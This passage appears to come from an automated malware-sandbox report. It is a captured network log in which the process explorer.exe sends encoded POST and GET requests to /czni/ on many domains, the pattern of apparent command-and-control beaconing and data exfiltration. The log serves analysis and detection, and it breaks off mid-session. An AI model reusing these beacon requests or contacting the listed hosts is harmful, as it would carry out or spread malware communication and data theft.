                                                                          Set-Cookie: _y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12:40:48 GMT; Domain=yeah-go.com; Path=/; SameSite=Lax
                                                                          Set-Cookie: _s=6d163f85-2949-4a42-b4ce-e10617e163d7; Expires=Mon, 30-Jan-23 13:10:48 GMT; Domain=yeah-go.com; Path=/; SameSite=Lax
                                                                          Set-Cookie: _shopify_y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49720 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:40:51.433516979 CET | 805 | OUT | GET /czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.yeah-go.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 30, 2023 13:40:51.482328892 CET | 806 | IN | HTTP/1.1 403 Forbidden
                                                                          Date: Mon, 30 Jan 2023 12:40:51 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 315
                                                                          X-Sorting-Hat-ShopId: 71134478652
                                                                          X-Dc: gcp-europe-west3
                                                                          X-Request-ID: aca3630a-5f6f-4e43-87f3-b653ec267e18
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvle4kgU20ZKzDTCZqnGDCg84KaskuIHELm853b%2FgasafBl0arBl%2FEvQXlSfKid125VO3dam81P%2B4h%2BU%2B9doD56%2BtDqU3pv4DJqkUuD6M0tOjSjy7t19uWYDuv1mXzEFCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Server-Timing: cfRequestDuration;dur=69.000006
                                                                          Server: cloudflare
                                                                          CF-RAY: 791a47497b3f6933-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49721 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:40:57.735447884 CET | 812 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.frogair.online
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.frogair.online
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.frogair.online/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=0q5nXk~Yar(Kdcu06qSAhsI47L1W0_SszNzXJqzma5QU4BAXNiQz11CrSJKVqXQQINwXhDFK4bC4pzZyF8CVwn(ry7RKLaxDBVnFOM2dvCOWEWv6WELHUpPW6dQkPbxNtcndPNDktu1ReW6JBm5-G8xA5uItVPwm(sVqOgMgprY1~NmDmQ).
Jan 30, 2023 13:40:57.756314993 CET | 813 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:57 GMT
                                                                          Server: Apache/2.4.54 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          13 | 192.168.2.5 | 49722 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:00.276262045 CET | 813 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg== HTTP/1.1
                                                                          Host: www.frogair.online
                                                                          Connection: close
                                                                          Jan 30, 2023 13:41:00.297307968 CET | 814 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:00 GMT
                                                                          Server: Apache/2.4.54 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          14 | 192.168.2.5 | 49723 | 199.192.28.121 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:05.966979027 CET | 815 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.deglaz.xyz
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.deglaz.xyz
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.deglaz.xyz/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=(6P6QReE79SJBmCuLNsFM6VWhm~agRRWFUB7iLsZT8wSmWeUtF8yQ72C8jnuyreo0xf5eXhSpwMs(wcSgLdcW4nTE7v8T8BI2bpDzzENQ4cXSdSBPKK0l9Nc5DW2REJVSMZ3nNfnM3bSq3aSnqHzuBnY6SwWunrGugGgtmCTuX38eahVXQ).
                                                                          Jan 30, 2023 13:41:06.251538992 CET | 816 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:06 GMT
                                                                          Server: Apache
                                                                          Content-Length: 16026
                                                                          Connection: close
                                                                          Content-Type: text/html


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          15 | 192.168.2.5 | 49724 | 199.192.28.121 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:08.676759005 CET | 832 | OUT | GET /czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.deglaz.xyz
                                                                          Connection: close
                                                                          Jan 30, 2023 13:41:08.968935966 CET | 834 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:08 GMT
                                                                          Server: Apache
                                                                          Content-Length: 16026
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          16 | 192.168.2.5 | 49726 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:14.234744072 CET | 857 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.laylaroseuk.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.laylaroseuk.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.laylaroseuk.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=PGhZS2c5cUz7VcIYJXaGe-NX6v3Ydtg2A5crLmVVbLoYL7zjjIoV8VfeL45UzySSGdSLOwxfmg61NT3hR3(dm5UHggB7SUPHFHeeQ8USw50llSc-FCPrpSomK9ZhSa4R6qlbHnJLTgPAGVU7(r6FeBwFEF(fSD2jlLYtZ22DcwiAOR7lcQ).
                                                                          Jan 30, 2023 13:41:14.270874023 CET | 857 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:41:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          17 | 192.168.2.5 | 49727 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:16.793785095 CET | 858 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg== HTTP/1.1
                                                                          Host: www.laylaroseuk.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:16.829987049 CET | 859 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:41:16 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          18 | 192.168.2.5 | 49728 | 142.44.131.177 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:24.053550005 CET | 860 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.lakeviewautomation.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.lakeviewautomation.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.lakeviewautomation.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=Cnd_50Q66ioZMceURGpCOZ4DMcewJgYnFtgI8mx1EqkI7RX_oUsjoWCNob3iRQ1anOK0AXgtwlKMBMHjCcl9R0qvXCZN1bbntAu3cHGo8k1aPscW~0fpPpBY(Kyk3o5f2-89neZeeH6wuWRZuTj7GTkmTDWhHCpGRDjZGsXddBQ0X3Qrgw).
                                                                          Jan 30, 2023 13:41:24.853339911 CET | 870 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.4.33
                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                                          content-type: text/html; charset=UTF-8
                                                                          link: <https://lakeviewautomation.com/wp-json/>; rel="https://api.w.org/"
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          vary: Accept-Encoding
                                                                          date: Mon, 30 Jan 2023 12:41:24 GMT
                                                                          server: LiteSpeed


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          19 | 192.168.2.5 | 49729 | 142.44.131.177 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:27.039952993 CET | 886 | OUT | GET /czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.lakeviewautomation.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:27.560183048 CET | 886 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.4.33
                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                                          content-type: text/html; charset=UTF-8
                                                                          x-redirect-by: WordPress
                                                                          location: http://lakeviewautomation.com/czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE
                                                                          content-length: 0
                                                                          date: Mon, 30 Jan 2023 12:41:27 GMT
                                                                          server: LiteSpeed


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          2 | 192.168.2.5 | 49709 | 194.58.112.174 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:00.713613987 CET | 754 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.toporsche.online
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.toporsche.online
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.toporsche.online/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=J6mwrtJteabTlS0R4sIE7xmim5mlJA~NVupz4uqb4sTLTBCVFqNEtOMIdC~ntwGyHZyclXTwVTgaxdyCENTqVjuy8j9FSq1elvStrfAxbcW69S9pq6iC0SrfmvFrzaxUO1TpQKWMvabjmXzCo0ebDAxijuRdE-hPepkI1ya56AoQ1OHOaA).
                                                                          Jan 30, 2023 13:40:00.773113966 CET | 755 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:40:00 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          20 | 192.168.2.5 | 49730 | 64.34.68.10 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:32.821962118 CET | 887 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.dellaone.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.dellaone.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.dellaone.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=khB9J2436-n4QOyv1af5uJKcFOu3eRyu4aODjMfRIj9voQTLSKglJ_TZW9KzajIE8rF8KRbkrWhut86h2nP4Zh5kM30GhM9I(FH1oLxNu8wyMOSTdF2AdZgxuOCtvQXncppxRTKsKWImAYXRyk(48e4pUt8kwOv69BlAoODhtE1oZaz1Tw).
                                                                          Jan 30, 2023 13:41:33.633341074 CET | 889 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:32 GMT
                                                                          Server: Apache
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-UA-Compatible: IE=edge
                                                                          Link: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Vary: Accept-Encoding,User-Agent
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Ascii: 3e05<!DOCTYPE html><html class="html" lang="en-CA"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; London Dairy Supply</title><meta name='robots' content='max-image-preview:large' /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//londondairysupply.com' /><link rel='dns-prefetch' href='//translate.google.com' /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Feed" href="https://londondairysupply.com/feed/" /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Comments Feed" href="https://londondairysupply.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"htt


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          21 | 192.168.2.5 | 49731 | 64.34.68.10 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:35.464464903 CET | 949 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=pjpdKCpJnNXPdeWbwYyFkbOLSaKVTVa2roCT8abPBwtlkFjZcqcvSY6Wc82/f3EmpMB4AQ+PhDNFqdOW9DbfejlZOApCjfoJ4Q== HTTP/1.1
                                                                          Host: www.dellaone.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:36.265957117 CET | 951 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:35 GMT
                                                                          Server: Apache
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-UA-Compatible: IE=edge
                                                                          Link: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Vary: Accept-Encoding,User-Agent
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Ascii: 3e05<!DOCTYPE html><html class="html" lang="en-CA"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; London Dairy Supply</title><meta name='robots' content='max-image-preview:large' /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//londondairysupply.com' /><link rel='dns-prefetch' href='//translate.google.com' /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Feed" href="https://londondairysupply.com/feed/" /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Comments Feed" href="https://londondairysupply.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"htt


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          22 | 192.168.2.5 | 49732 | 217.160.0.94 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:46.598280907 CET | 1012 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.arritalvigo.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.arritalvigo.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.arritalvigo.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=2AGTLNFRrjrvueHiptRviaM3n95bHr44nTpixTzNgfPfGPd-~ELbE_iU~Hd8Lyv2qqu5~WEWBKRxT01pTvH7Z9FY(9dONQKODlxvje11AFEckcUux0tUPZ48kdiXoZX7OCSIAbFIksjelgjs1fGs1uYlrBjKJ4T68CZMzCkPzPSdYNxKlw).
                                                                          Jan 30, 2023 13:41:46.629065037 CET | 1013 | IN | HTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Mon, 30 Jan 2023 12:41:46 GMT
                                                                          Server: Apache
                                                                          X-Frame-Options: deny
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          23 | 192.168.2.5 | 49734 | 217.160.0.94 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:41:49.192296982 CET | 1020 | OUT | GET /czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.arritalvigo.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:49.222229958 CET | 1022 | IN | HTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Content-Length: 1271
                                                                          Connection: close
                                                                          Date: Mon, 30 Jan 2023 12:41:49 GMT
                                                                          Server: Apache
                                                                          X-Frame-Options: deny
                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/'
                                                                          Jan 30, 2023 13:41:49.222260952 CET  1022  IN
                                                                          Data Ascii: + 'IONOSParkingES' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          24  192.168.2.5  49735  67.215.9.138  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:41:54.457782984 CET  1023  OUT  POST /czni/ HTTP/1.1
                                                                          Host: www.versusfinances.tech
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.versusfinances.tech
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.versusfinances.tech/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=ubf6WlENbxkW7DQQ98X0bUBo5GmsRxH9glEUQSZ66lOJgbzFMzbaoZWdUmWRhmVO(7K1ynWqk0UWPF3Yn2AM8uGESexcH0Ogh0w7CBB9zJrGSFEI1Pw86jqp0J1a3-oPHEOfcIgtx6dRaijg7NmYxf~QhoATv-GG1FSK6lYdxEGQHl4UXQ).
                                                                          Jan 30, 2023 13:41:54.568286896 CET  1024  IN  HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          content-type: text/html
                                                                          content-length: 244
                                                                          content-encoding: gzip
                                                                          vary: Accept-Encoding,User-Agent
                                                                          date: Mon, 30 Jan 2023 12:41:54 GMT
                                                                          server: LiteSpeed


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          25  192.168.2.5  49736  67.215.9.138  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:41:57.089145899 CET  1024  OUT  GET /czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== HTTP/1.1
                                                                          Host: www.versusfinances.tech
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:57.198988914 CET  1025  IN  HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          content-type: text/html
                                                                          content-length: 611
                                                                          date: Mon, 30 Jan 2023 12:41:57 GMT
                                                                          server: LiteSpeed
                                                                          vary: User-Agent
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /czni/?20=4xfPiv3RnE&amp;z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== was not found on this server.<HR><I>www.versusfinances.tech</I></BODY></HTML>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          26  192.168.2.5  49737  185.104.28.238  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:42:07.322936058 CET  1026  OUT  POST /czni/ HTTP/1.1
                                                                          Host: www.hayethe.site
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.hayethe.site
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.hayethe.site/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=aY3s~Zzc8XDc2t7khO4sSbU0u57HBwd0X48p2F~JllnwRjiT85Tfj2QfWCXmjJ2i~pokBYqU~JHvVWXm2MnWy5D_ZVL_F3ed3eA9~Eq11fQ4MCFvixb53K(Oix58SksMwXcJM4e0FisdCuzwFgZ_ZuADEZZEvULFkhHtoSUu4JJ8cRoHsw).
                                                                          Jan 30, 2023 13:42:07.349845886 CET  1027  IN  HTTP/1.1 404 Not Found
                                                                          date: Mon, 30 Jan 2023 12:42:07 GMT
                                                                          server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
                                                                          content-length: 203
                                                                          content-type: text/html; charset=iso-8859-1
                                                                          connection: close
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          27  192.168.2.5  49738  185.104.28.238  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:42:09.881613970 CET  1027  OUT  GET /czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.hayethe.site
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:09.908283949 CET  1028  IN  HTTP/1.1 404 Not Found
                                                                          date: Mon, 30 Jan 2023 12:42:09 GMT
                                                                          server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
                                                                          content-length: 203
                                                                          content-type: text/html; charset=iso-8859-1
                                                                          connection: close
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          28  192.168.2.5  49739  172.67.179.191  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:42:14.977011919 CET  1029  OUT  POST /czni/ HTTP/1.1
